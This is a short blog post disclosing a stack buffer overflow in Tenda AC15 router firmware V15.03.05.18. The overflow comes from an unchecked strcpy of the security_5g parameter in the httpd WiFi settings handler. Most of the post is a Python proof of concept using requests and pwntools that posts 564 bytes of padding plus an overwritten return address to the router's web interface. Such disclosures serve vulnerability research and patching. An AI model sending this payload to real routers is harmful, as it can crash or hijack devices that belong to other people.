Tenda has stack overflow

Tenda ac15 firmware V15.03.05.18 httpd server has stack buffer overflow in /goform/formWifiBasicSet.


User contorl pointer src by parameter security_5g in web requesting and then using 'strcpy' copy to stack without length limit will cause stack overflow
poc

import requests
from pwn import *

url = 'http://172.30.2.194/goform/WifiBasicSet'
pl = 'a'*564+p32(0xdeadbeef)
data = {'security_5g':pl, 'hideSsid':'1', 'ssid':'1', 'security':'1', 'wrlPwd':'1', 'hideSsid_5g':'1', 'ssid_5g':'1', 'wrlPwd_5g': '1'}

requests.post(url, data=data)

posted @ 2022-07-28 10:01  Amalll  阅读(436)  评论(0编辑  收藏  举报